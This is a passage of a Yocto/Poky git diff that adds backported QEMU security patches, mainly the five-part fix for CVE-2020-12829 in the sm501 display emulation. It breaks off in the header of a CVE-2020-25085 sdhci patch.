file://CVE-2021-20221.patch \ + file://CVE-2021-20181.patch \ + file://CVE-2021-3416_1.patch \ + file://CVE-2021-3416_2.patch \ + file://CVE-2021-3416_3.patch \ + file://CVE-2021-3416_5.patch \ + file://CVE-2021-3416_6.patch \ + file://CVE-2021-3416_7.patch \ + file://CVE-2021-3416_8.patch \ + file://CVE-2021-3416_9.patch \ + file://CVE-2021-3416_10.patch \ + file://CVE-2021-20257.patch \ + file://CVE-2021-3544.patch \ + file://CVE-2021-3544_2.patch \ + file://CVE-2021-3544_3.patch \ + file://CVE-2021-3544_4.patch \ + file://CVE-2021-3544_5.patch \ + file://CVE-2021-3545.patch \ + file://CVE-2021-3546.patch \ + file://CVE-2021-3527-1.patch \ + file://CVE-2021-3527-2.patch \ + file://CVE-2021-3582.patch \ + file://CVE-2021-3607.patch \ + file://CVE-2021-3608.patch \ + file://CVE-2020-12829_1.patch \ + file://CVE-2020-12829_2.patch \ + file://CVE-2020-12829_3.patch \ + file://CVE-2020-12829_4.patch \ + file://CVE-2020-12829_5.patch \ + file://CVE-2020-27617.patch \ + file://CVE-2020-28916.patch \ + file://CVE-2021-3682.patch \ + " UPSTREAM_CHECK_REGEX = "qemu-(?P<pver>\d+(\.\d+)+)\.tar" SRC_URI[md5sum] = "278eeb294e4b497e79af7a57e660cb9a" diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_1.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_1.patch new file mode 100644 index 0000000000..6fee4f640d --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_1.patch @@ -0,0 +1,164 @@ +From e29da77e5fddf6480e3a0e80b63d703edaec751b Mon Sep 17 00:00:00 2001 +From: BALATON Zoltan <balaton@eik.bme.hu> +Date: Thu, 21 May 2020 21:39:44 +0200 +Subject: [PATCH] sm501: Convert printf + abort to qemu_log_mask +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Some places already use qemu_log_mask() to log unimplemented features +or errors but some others have printf() then abort(). Convert these to +qemu_log_mask() and avoid aborting to prevent guests to easily cause +denial of service. + +Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu> +Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com> +Message-id: 305af87f59d81e92f2aaff09eb8a3603b8baa322.1590089984.git.balaton@eik.bme.hu +Signed-off-by: Gerd Hoffmann <kraxel@redhat.com> + +Upstream-Status: Backport +CVE: CVE-2020-12829 dep#1 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + hw/display/sm501.c | 57 ++++++++++++++++++++++------------------------ + 1 file changed, 27 insertions(+), 30 deletions(-) + +diff --git a/hw/display/sm501.c b/hw/display/sm501.c +index acc692531a..bd3ccfe311 100644 +--- a/hw/display/sm501.c ++++ b/hw/display/sm501.c +@@ -727,8 +727,8 @@ static void sm501_2d_operation(SM501State *s) + int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt); + + if (addressing != 0x0) { +- printf("%s: only XY addressing is supported.\n", __func__); +- abort(); ++ qemu_log_mask(LOG_UNIMP, "sm501: only XY addressing is supported.\n"); ++ return; + } + + if (rop_mode == 0) { +@@ -754,8 +754,8 @@ static void sm501_2d_operation(SM501State *s) + + if ((s->twoD_source_base & 0x08000000) || + (s->twoD_destination_base & 0x08000000)) { +- printf("%s: only local memory is supported.\n", __func__); +- abort(); ++ qemu_log_mask(LOG_UNIMP, "sm501: only local memory is supported.\n"); ++ return; + } + + switch (operation) { +@@ -823,9 +823,9 @@ static void sm501_2d_operation(SM501State *s) + break; + + default: +- printf("non-implemented SM501 2D operation. %d\n", operation); +- abort(); +- break; ++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2D operation: %d\n", ++ operation); ++ return; + } + + if (dst_base >= get_fb_addr(s, crt) && +@@ -892,9 +892,8 @@ static uint64_t sm501_system_config_read(void *opaque, hwaddr addr, + break; + + default: +- printf("sm501 system config : not implemented register read." +- " addr=%x\n", (int)addr); +- abort(); ++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented system config" ++ "register read. addr=%" HWADDR_PRIx "\n", addr); + } + + return ret; +@@ -948,15 +947,15 @@ static void sm501_system_config_write(void *opaque, hwaddr addr, + break; + case SM501_ENDIAN_CONTROL: + if (value & 0x00000001) { +- printf("sm501 system config : big endian mode not implemented.\n"); +- abort(); ++ qemu_log_mask(LOG_UNIMP, "sm501: system config big endian mode not" ++ " implemented.\n"); + } + break; + + default: +- printf("sm501 system config : not implemented register write." +- " addr=%x, val=%x\n", (int)addr, (uint32_t)value); +- abort(); ++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented system config" ++ "register write. addr=%" HWADDR_PRIx ++ ", val=%" PRIx64 "\n", addr, value); + } + } + +@@ -1207,9 +1206,8 @@ static uint64_t sm501_disp_ctrl_read(void *opaque, hwaddr addr, + break; + + default: +- printf("sm501 disp ctrl : not implemented register read." +- " addr=%x\n", (int)addr); +- abort(); ++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented disp ctrl register " ++ "read. addr=%" HWADDR_PRIx "\n", addr); + } + + return ret; +@@ -1345,9 +1343,9 @@ static void sm501_disp_ctrl_write(void *opaque, hwaddr addr, + break; + + default: +- printf("sm501 disp ctrl : not implemented register write." +- " addr=%x, val=%x\n", (int)addr, (unsigned)value); +- abort(); ++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented disp ctrl register " ++ "write. addr=%" HWADDR_PRIx ++ ", val=%" PRIx64 "\n", addr, value); + } + } + +@@ -1433,9 +1431,8 @@ static uint64_t sm501_2d_engine_read(void *opaque, hwaddr addr, + ret = 0; /* Should return interrupt status */ + break; + default: +- printf("sm501 disp ctrl : not implemented register read." +- " addr=%x\n", (int)addr); +- abort(); ++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented disp ctrl register " ++ "read. addr=%" HWADDR_PRIx "\n", addr); + } + + return ret; +@@ -1520,9 +1517,9 @@ static void sm501_2d_engine_write(void *opaque, hwaddr addr, + /* ignored, writing 0 should clear interrupt status */ + break; + default: +- printf("sm501 2d engine : not implemented register write." +- " addr=%x, val=%x\n", (int)addr, (unsigned)value); +- abort(); ++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2d engine register " ++ "write. addr=%" HWADDR_PRIx ++ ", val=%" PRIx64 "\n", addr, value); + } + } + +@@ -1670,9 +1667,9 @@ static void sm501_update_display(void *opaque) + draw_line = draw_line32_funcs[dst_depth_index]; + break; + default: +- printf("sm501 update display : invalid control register value.\n"); +- abort(); +- break; ++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: update display" ++ "invalid control register value.\n"); ++ return; + } + + /* set up to draw hardware cursor */ +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch new file mode 100644 index 0000000000..e7258a43d3 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch @@ -0,0 +1,139 @@ +From 6f8183b5dc5b309378687830a25e85ea8fb860ea Mon Sep 17 00:00:00 2001 +From: BALATON Zoltan <balaton@eik.bme.hu> +Date: Thu, 21 May 2020 21:39:44 +0200 +Subject: [PATCH 2/5] sm501: Shorten long variable names in sm501_2d_operation + +This increases readability and cleans up some confusing naming. + +Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu> +Message-id: b9b67b94c46e945252a73c77dfd117132c63c4fb.1590089984.git.balaton@eik.bme.hu +Signed-off-by: Gerd Hoffmann <kraxel@redhat.com> + +Upstream-Status: Backport +CVE: CVE-2020-12829 dep#2 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + hw/display/sm501.c | 45 ++++++++++++++++++++++----------------------- + 1 file changed, 22 insertions(+), 23 deletions(-) + +diff --git a/hw/display/sm501.c b/hw/display/sm501.c +index bd3ccfe311..f42d05e1e4 100644 +--- a/hw/display/sm501.c ++++ b/hw/display/sm501.c +@@ -700,17 +700,16 @@ static inline void hwc_invalidate(SM501State *s, int crt) + static void sm501_2d_operation(SM501State *s) + { + /* obtain operation parameters */ +- int operation = (s->twoD_control >> 16) & 0x1f; ++ int cmd = (s->twoD_control >> 16) & 0x1F; + int rtl = s->twoD_control & 0x8000000; + int src_x = (s->twoD_source >> 16) & 0x01FFF; + int src_y = s->twoD_source & 0xFFFF; + int dst_x = (s->twoD_destination >> 16) & 0x01FFF; + int dst_y = s->twoD_destination & 0xFFFF; +- int operation_width = (s->twoD_dimension >> 16) & 0x1FFF; +- int operation_height = s->twoD_dimension & 0xFFFF; ++ int width = (s->twoD_dimension >> 16) & 0x1FFF; ++ int height = s->twoD_dimension & 0xFFFF; + uint32_t color = s->twoD_foreground; +- int format_flags = (s->twoD_stretch >> 20) & 0x3; +- int addressing = (s->twoD_stretch >> 16) & 0xF; ++ int format = (s->twoD_stretch >> 20) & 0x3; + int rop_mode = (s->twoD_control >> 15) & 0x1; /* 1 for rop2, else rop3 */ + /* 1 if rop2 source is the pattern, otherwise the source is the bitmap */ + int rop2_source_is_pattern = (s->twoD_control >> 14) & 0x1; +@@ -721,12 +720,12 @@ static void sm501_2d_operation(SM501State *s) + /* get frame buffer info */ + uint8_t *src = s->local_mem + src_base; + uint8_t *dst = s->local_mem + dst_base; +- int src_width = s->twoD_pitch & 0x1FFF; +- int dst_width = (s->twoD_pitch >> 16) & 0x1FFF; ++ int src_pitch = s->twoD_pitch & 0x1FFF; ++ int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF; + int crt = (s->dc_crt_control & SM501_DC_CRT_CONTROL_SEL) ? 1 : 0; + int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt); + +- if (addressing != 0x0) { ++ if ((s->twoD_stretch >> 16) & 0xF) { + qemu_log_mask(LOG_UNIMP, "sm501: only XY addressing is supported.\n"); + return; + } +@@ -758,20 +757,20 @@ static void sm501_2d_operation(SM501State *s) + return; + } + +- switch (operation) { ++ switch (cmd) { + case 0x00: /* copy area */ + #define COPY_AREA(_bpp, _pixel_type, rtl) { \ + int y, x, index_d, index_s; \ +- for (y = 0; y < operation_height; y++) { \ +- for (x = 0; x < operation_width; x++) { \ ++ for (y = 0; y < height; y++) { \ ++ for (x = 0; x < width; x++) { \ + _pixel_type val; \ + \ + if (rtl) { \ +- index_s = ((src_y - y) * src_width + src_x - x) * _bpp; \ +- index_d = ((dst_y - y) * dst_width + dst_x - x) * _bpp; \ ++ index_s = ((src_y - y) * src_pitch + src_x - x) * _bpp; \ ++ index_d = ((dst_y - y) * dst_pitch + dst_x - x) * _bpp; \ + } else { \ +- index_s = ((src_y + y) * src_width + src_x + x) * _bpp; \ +- index_d = ((dst_y + y) * dst_width + dst_x + x) * _bpp; \ ++ index_s = ((src_y + y) * src_pitch + src_x + x) * _bpp; \ ++ index_d = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \ + } \ + if (rop_mode == 1 && rop == 5) { \ + /* Invert dest */ \ +@@ -783,7 +782,7 @@ static void sm501_2d_operation(SM501State *s) + } \ + } \ + } +- switch (format_flags) { ++ switch (format) { + case 0: + COPY_AREA(1, uint8_t, rtl); + break; +@@ -799,15 +798,15 @@ static void sm501_2d_operation(SM501State *s) + case 0x01: /* fill rectangle */ + #define FILL_RECT(_bpp, _pixel_type) { \ + int y, x; \ +- for (y = 0; y < operation_height; y++) { \ +- for (x = 0; x < operation_width; x++) { \ +- int index = ((dst_y + y) * dst_width + dst_x + x) * _bpp; \ ++ for (y = 0; y < height; y++) { \ ++ for (x = 0; x < width; x++) { \ ++ int index = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \ + *(_pixel_type *)&dst[index] = (_pixel_type)color; \ + } \ + } \ + } + +- switch (format_flags) { ++ switch (format) { + case 0: + FILL_RECT(1, uint8_t); + break; +@@ -824,14 +823,14 @@ static void sm501_2d_operation(SM501State *s) + + default: + qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2D operation: %d\n", +- operation); ++ cmd); + return; + } + + if (dst_base >= get_fb_addr(s, crt) && + dst_base <= get_fb_addr(s, crt) + fb_len) { +- int dst_len = MIN(fb_len, ((dst_y + operation_height - 1) * dst_width + +- dst_x + operation_width) * (1 << format_flags)); ++ int dst_len = MIN(fb_len, ((dst_y + height - 1) * dst_pitch + ++ dst_x + width) * (1 << format)); + if (dst_len) { + memory_region_set_dirty(&s->local_mem_region, dst_base, dst_len); + } +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch new file mode 100644 index 0000000000..c647028cfe --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch @@ -0,0 +1,47 @@ +From 2824809b7f8f03ddc6e2b7e33e78c06022424298 Mon Sep 17 00:00:00 2001 +From: BALATON Zoltan <balaton@eik.bme.hu> +Date: Thu, 21 May 2020 21:39:44 +0200 +Subject: [PATCH 3/5] sm501: Use BIT(x) macro to shorten constant +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu> +Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com> +Message-id: 124bf5de8d7cf503b32b377d0445029a76bfbd49.1590089984.git.balaton@eik.bme.hu +Signed-off-by: Gerd Hoffmann <kraxel@redhat.com> + +Upstream-Status: Backport +CVE: CVE-2020-12829 dep#3 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + hw/display/sm501.c | 5 ++--- + 1 file changed, 2 insertions(+), 3 deletions(-) + +diff --git a/hw/display/sm501.c b/hw/display/sm501.c +index f42d05e1e4..97660090bb 100644 +--- a/hw/display/sm501.c ++++ b/hw/display/sm501.c +@@ -701,7 +701,7 @@ static void sm501_2d_operation(SM501State *s) + { + /* obtain operation parameters */ + int cmd = (s->twoD_control >> 16) & 0x1F; +- int rtl = s->twoD_control & 0x8000000; ++ int rtl = s->twoD_control & BIT(27); + int src_x = (s->twoD_source >> 16) & 0x01FFF; + int src_y = s->twoD_source & 0xFFFF; + int dst_x = (s->twoD_destination >> 16) & 0x01FFF; +@@ -751,8 +751,7 @@ static void sm501_2d_operation(SM501State *s) + } + } + +- if ((s->twoD_source_base & 0x08000000) || +- (s->twoD_destination_base & 0x08000000)) { ++ if (s->twoD_source_base & BIT(27) || s->twoD_destination_base & BIT(27)) { + qemu_log_mask(LOG_UNIMP, "sm501: only local memory is supported.\n"); + return; + } +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch new file mode 100644 index 0000000000..485af05e1e --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch @@ -0,0 +1,100 @@ +From 3d0b096298b5579a7fa0753ad90968b27bc65372 Mon Sep 17 00:00:00 2001 +From: BALATON Zoltan <balaton@eik.bme.hu> +Date: Thu, 21 May 2020 21:39:44 +0200 +Subject: [PATCH 4/5] sm501: Clean up local variables in sm501_2d_operation +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Make variables local to the block they are used in to make it clearer +which operation they are needed for. + +Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu> +Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com> +Message-id: ae59f8138afe7f6a5a4a82539d0f61496a906b06.1590089984.git.balaton@eik.bme.hu +Signed-off-by: Gerd Hoffmann <kraxel@redhat.com> + +Upstream-Status: Backport +CVE: CVE-2020-12829 dep#4 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + hw/display/sm501.c | 31 ++++++++++++++++--------------- + 1 file changed, 16 insertions(+), 15 deletions(-) + +diff --git a/hw/display/sm501.c b/hw/display/sm501.c +index 97660090bb..5ed57703d8 100644 +--- a/hw/display/sm501.c ++++ b/hw/display/sm501.c +@@ -699,28 +699,19 @@ static inline void hwc_invalidate(SM501State *s, int crt) + + static void sm501_2d_operation(SM501State *s) + { +- /* obtain operation parameters */ + int cmd = (s->twoD_control >> 16) & 0x1F; + int rtl = s->twoD_control & BIT(27); +- int src_x = (s->twoD_source >> 16) & 0x01FFF; +- int src_y = s->twoD_source & 0xFFFF; +- int dst_x = (s->twoD_destination >> 16) & 0x01FFF; +- int dst_y = s->twoD_destination & 0xFFFF; +- int width = (s->twoD_dimension >> 16) & 0x1FFF; +- int height = s->twoD_dimension & 0xFFFF; +- uint32_t color = s->twoD_foreground; + int format = (s->twoD_stretch >> 20) & 0x3; + int rop_mode = (s->twoD_control >> 15) & 0x1; /* 1 for rop2, else rop3 */ + /* 1 if rop2 source is the pattern, otherwise the source is the bitmap */ + int rop2_source_is_pattern = (s->twoD_control >> 14) & 0x1; + int rop = s->twoD_control & 0xFF; +- uint32_t src_base = s->twoD_source_base & 0x03FFFFFF; ++ int dst_x = (s->twoD_destination >> 16) & 0x01FFF; ++ int dst_y = s->twoD_destination & 0xFFFF; ++ int width = (s->twoD_dimension >> 16) & 0x1FFF; ++ int height = s->twoD_dimension & 0xFFFF; + uint32_t dst_base = s->twoD_destination_base & 0x03FFFFFF; +- +- /* get frame buffer info */ +- uint8_t *src = s->local_mem + src_base; + uint8_t *dst = s->local_mem + dst_base; +- int src_pitch = s->twoD_pitch & 0x1FFF; + int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF; + int crt = (s->dc_crt_control & SM501_DC_CRT_CONTROL_SEL) ? 1 : 0; + int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt); +@@ -758,6 +749,13 @@ static void sm501_2d_operation(SM501State *s) + + switch (cmd) { + case 0x00: /* copy area */ ++ { ++ int src_x = (s->twoD_source >> 16) & 0x01FFF; ++ int src_y = s->twoD_source & 0xFFFF; ++ uint32_t src_base = s->twoD_source_base & 0x03FFFFFF; ++ uint8_t *src = s->local_mem + src_base; ++ int src_pitch = s->twoD_pitch & 0x1FFF; ++ + #define COPY_AREA(_bpp, _pixel_type, rtl) { \ + int y, x, index_d, index_s; \ + for (y = 0; y < height; y++) { \ +@@ -793,8 +791,11 @@ static void sm501_2d_operation(SM501State *s) + break; + } + break; +- ++ } + case 0x01: /* fill rectangle */ ++ { ++ uint32_t color = s->twoD_foreground; ++ + #define FILL_RECT(_bpp, _pixel_type) { \ + int y, x; \ + for (y = 0; y < height; y++) { \ +@@ -819,7 +820,7 @@ static void sm501_2d_operation(SM501State *s) + break; + } + break; +- ++ } + default: + qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2D operation: %d\n", + cmd); +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch new file mode 100644 index 0000000000..ab09e8b039 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch @@ -0,0 +1,266 @@ +From b15a22bbcbe6a78dc3d88fe3134985e4cdd87de4 Mon Sep 17 00:00:00 2001 +From: BALATON Zoltan <balaton@eik.bme.hu> +Date: Thu, 21 May 2020 21:39:44 +0200 +Subject: [PATCH 5/5] sm501: Replace hand written implementation with pixman + where possible + +Besides being faster this should also prevent malicious guests to +abuse 2D engine to overwrite data or cause a crash. + +Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu> +Message-id: 58666389b6cae256e4e972a32c05cf8aa51bffc0.1590089984.git.balaton@eik.bme.hu +Signed-off-by: Gerd Hoffmann <kraxel@redhat.com> + +Upstream-Status: Backport +CVE: CVE-2020-12829 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + hw/display/sm501.c | 207 ++++++++++++++++++++++++++------------------- + 1 file changed, 119 insertions(+), 88 deletions(-) + +diff --git a/hw/display/sm501.c b/hw/display/sm501.c +index 5ed57703d8..8bf4d111f4 100644 +--- a/hw/display/sm501.c ++++ b/hw/display/sm501.c +@@ -706,13 +706,12 @@ static void sm501_2d_operation(SM501State *s) + /* 1 if rop2 source is the pattern, otherwise the source is the bitmap */ + int rop2_source_is_pattern = (s->twoD_control >> 14) & 0x1; + int rop = s->twoD_control & 0xFF; +- int dst_x = (s->twoD_destination >> 16) & 0x01FFF; +- int dst_y = s->twoD_destination & 0xFFFF; +- int width = (s->twoD_dimension >> 16) & 0x1FFF; +- int height = s->twoD_dimension & 0xFFFF; ++ unsigned int dst_x = (s->twoD_destination >> 16) & 0x01FFF; ++ unsigned int dst_y = s->twoD_destination & 0xFFFF; ++ unsigned int width = (s->twoD_dimension >> 16) & 0x1FFF; ++ unsigned int height = s->twoD_dimension & 0xFFFF; + uint32_t dst_base = s->twoD_destination_base & 0x03FFFFFF; +- uint8_t *dst = s->local_mem + dst_base; +- int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF; ++ unsigned int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF; + int crt = (s->dc_crt_control & SM501_DC_CRT_CONTROL_SEL) ? 1 : 0; + int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt); + +@@ -721,104 +720,136 @@ static void sm501_2d_operation(SM501State *s) + return; + } + +- if (rop_mode == 0) { +- if (rop != 0xcc) { +- /* Anything other than plain copies are not supported */ +- qemu_log_mask(LOG_UNIMP, "sm501: rop3 mode with rop %x is not " +- "supported.\n", rop); +- } +- } else { +- if (rop2_source_is_pattern && rop != 0x5) { +- /* For pattern source, we support only inverse dest */ +- qemu_log_mask(LOG_UNIMP, "sm501: rop2 source being the pattern and " +- "rop %x is not supported.\n", rop); +- } else { +- if (rop != 0x5 && rop != 0xc) { +- /* Anything other than plain copies or inverse dest is not +- * supported */ +- qemu_log_mask(LOG_UNIMP, "sm501: rop mode %x is not " +- "supported.\n", rop); +- } +- } +- } +- + if (s->twoD_source_base & BIT(27) || s->twoD_destination_base & BIT(27)) { + qemu_log_mask(LOG_UNIMP, "sm501: only local memory is supported.\n"); + return; + } + ++ if (!dst_pitch) { ++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: Zero dest pitch.\n"); ++ return; ++ } ++ ++ if (!width || !height) { ++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: Zero size 2D op.\n"); ++ return; ++ } ++ ++ if (rtl) { ++ dst_x -= width - 1; ++ dst_y -= height - 1; ++ } ++ ++ if (dst_base >= get_local_mem_size(s) || dst_base + ++ (dst_x + width + (dst_y + height) * (dst_pitch + width)) * ++ (1 << format) >= get_local_mem_size(s)) { ++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: 2D op dest is outside vram.\n"); ++ return; ++ } ++ + switch (cmd) { +- case 0x00: /* copy area */ ++ case 0: /* BitBlt */ + { +- int src_x = (s->twoD_source >> 16) & 0x01FFF; +- int src_y = s->twoD_source & 0xFFFF; ++ unsigned int src_x = (s->twoD_source >> 16) & 0x01FFF; ++ unsigned int src_y = s->twoD_source & 0xFFFF; + uint32_t src_base = s->twoD_source_base & 0x03FFFFFF; +- uint8_t *src = s->local_mem + src_base; +- int src_pitch = s->twoD_pitch & 0x1FFF; +- +-#define COPY_AREA(_bpp, _pixel_type, rtl) { \ +- int y, x, index_d, index_s; \ +- for (y = 0; y < height; y++) { \ +- for (x = 0; x < width; x++) { \ +- _pixel_type val; \ +- \ +- if (rtl) { \ +- index_s = ((src_y - y) * src_pitch + src_x - x) * _bpp; \ +- index_d = ((dst_y - y) * dst_pitch + dst_x - x) * _bpp; \ +- } else { \ +- index_s = ((src_y + y) * src_pitch + src_x + x) * _bpp; \ +- index_d = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \ +- } \ +- if (rop_mode == 1 && rop == 5) { \ +- /* Invert dest */ \ +- val = ~*(_pixel_type *)&dst[index_d]; \ +- } else { \ +- val = *(_pixel_type *)&src[index_s]; \ +- } \ +- *(_pixel_type *)&dst[index_d] = val; \ +- } \ +- } \ +- } +- switch (format) { +- case 0: +- COPY_AREA(1, uint8_t, rtl); +- break; +- case 1: +- COPY_AREA(2, uint16_t, rtl); +- break; +- case 2: +- COPY_AREA(4, uint32_t, rtl); +- break; ++ unsigned int src_pitch = s->twoD_pitch & 0x1FFF; ++ ++ if (!src_pitch) { ++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: Zero src pitch.\n"); ++ return; ++ } ++ ++ if (rtl) { ++ src_x -= width - 1; ++ src_y -= height - 1; ++ } ++ ++ if (src_base >= get_local_mem_size(s) || src_base + ++ (src_x + width + (src_y + height) * (src_pitch + width)) * ++ (1 << format) >= get_local_mem_size(s)) { ++ qemu_log_mask(LOG_GUEST_ERROR, ++ "sm501: 2D op src is outside vram.\n"); ++ return; ++ } ++ ++ if ((rop_mode && rop == 0x5) || (!rop_mode && rop == 0x55)) { ++ /* Invert dest, is there a way to do this with pixman? */ ++ unsigned int x, y, i; ++ uint8_t *d = s->local_mem + dst_base; ++ ++ for (y = 0; y < height; y++) { ++ i = (dst_x + (dst_y + y) * dst_pitch) * (1 << format); ++ for (x = 0; x < width; x++, i += (1 << format)) { ++ switch (format) { ++ case 0: ++ d[i] = ~d[i]; ++ break; ++ case 1: ++ *(uint16_t *)&d[i] = ~*(uint16_t *)&d[i]; ++ break; ++ case 2: ++ *(uint32_t *)&d[i] = ~*(uint32_t *)&d[i]; ++ break; ++ } ++ } ++ } ++ } else { ++ /* Do copy src for unimplemented ops, better than unpainted area */ ++ if ((rop_mode && (rop != 0xc || rop2_source_is_pattern)) || ++ (!rop_mode && rop != 0xcc)) { ++ qemu_log_mask(LOG_UNIMP, ++ "sm501: rop%d op %x%s not implemented\n", ++ (rop_mode ? 2 : 3), rop, ++ (rop2_source_is_pattern ? ++ " with pattern source" : "")); ++ } ++ /* Check for overlaps, this could be made more exact */ ++ uint32_t sb, se, db, de; ++ sb = src_base + src_x + src_y * (width + src_pitch); ++ se = sb + width + height * (width + src_pitch); ++ db = dst_base + dst_x + dst_y * (width + dst_pitch); ++ de = db + width + height * (width + dst_pitch); ++ if (rtl && ((db >= sb && db <= se) || (de >= sb && de <= se))) { ++ /* regions may overlap: copy via temporary */ ++ int llb = width * (1 << format); ++ int tmp_stride = DIV_ROUND_UP(llb, sizeof(uint32_t)); ++ uint32_t *tmp = g_malloc(tmp_stride * sizeof(uint32_t) * ++ height); ++ pixman_blt((uint32_t *)&s->local_mem[src_base], tmp, ++ src_pitch * (1 << format) / sizeof(uint32_t), ++ tmp_stride, 8 * (1 << format), 8 * (1 << format), ++ src_x, src_y, 0, 0, width, height); ++ pixman_blt(tmp, (uint32_t *)&s->local_mem[dst_base], ++ tmp_stride, ++ dst_pitch * (1 << format) / sizeof(uint32_t), ++ 8 * (1 << format), 8 * (1 << format), ++ 0, 0, dst_x, dst_y, width, height); ++ g_free(tmp); ++ } else { ++ pixman_blt((uint32_t *)&s->local_mem[src_base], ++ (uint32_t *)&s->local_mem[dst_base], ++ src_pitch * (1 << format) / sizeof(uint32_t), ++ dst_pitch * (1 << format) / sizeof(uint32_t), ++ 8 * (1 << format), 8 * (1 << format), ++ src_x, src_y, dst_x, dst_y, width, height); ++ } + } + break; + } +- case 0x01: /* fill rectangle */ ++ case 1: /* Rectangle Fill */ + { + uint32_t color = s->twoD_foreground; + +-#define FILL_RECT(_bpp, _pixel_type) { \ +- int y, x; \ +- for (y = 0; y < height; y++) { \ +- for (x = 0; x < width; x++) { \ +- int index = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \ +- *(_pixel_type *)&dst[index] = (_pixel_type)color; \ +- } \ +- } \ +- } +- +- switch (format) { +- case 0: +- FILL_RECT(1, uint8_t); +- break; +- case 1: +- color = cpu_to_le16(color); +- FILL_RECT(2, uint16_t); +- break; +- case 2: ++ if (format == 2) { + color = cpu_to_le32(color); +- FILL_RECT(4, uint32_t); +- break; ++ } else if (format == 1) { ++ color = cpu_to_le16(color); + } ++ ++ pixman_fill((uint32_t *)&s->local_mem[dst_base], ++ dst_pitch * (1 << format) / sizeof(uint32_t), ++ 8 * (1 << format), dst_x, dst_y, width, height, color); + break; + } + default: +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch new file mode 100644 index 0000000000..be19256cef --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch @@ -0,0 +1,46 @@ +From dfba99f17feb6d4a129da19d38df1bcd8579d1c3 Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org> +Date: Tue, 1 Sep 2020 15:22:06 +0200 +Subject: [PATCH] hw/sd/sdhci: Fix DMA Transfer Block Size field +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +The 'Transfer Block Size' field is 12-bit wide. + +See section '2.2.2. Block Size Register (Offset 004h)' in datasheet. + +Two different bug reproducer available: +- https://bugs.launchpad.net/qemu/+bug/1892960 +- https://ruhr-uni-bochum.sciebo.de/s/NNWP2GfwzYKeKwE?path=%2Fsdhci_oob_write1 + +Cc: qemu-stable@nongnu.org +Buglink: https://bugs.launchpad.net/qemu/+bug/1892960 +Fixes: d7dfca0807a ("hw/sdhci: introduce standard SD host controller") +Reported-by: Alexander Bulekov <alxndr@bu.edu> +Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org> +Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org> +Tested-by: Alexander Bulekov <alxndr@bu.edu> +Message-Id: 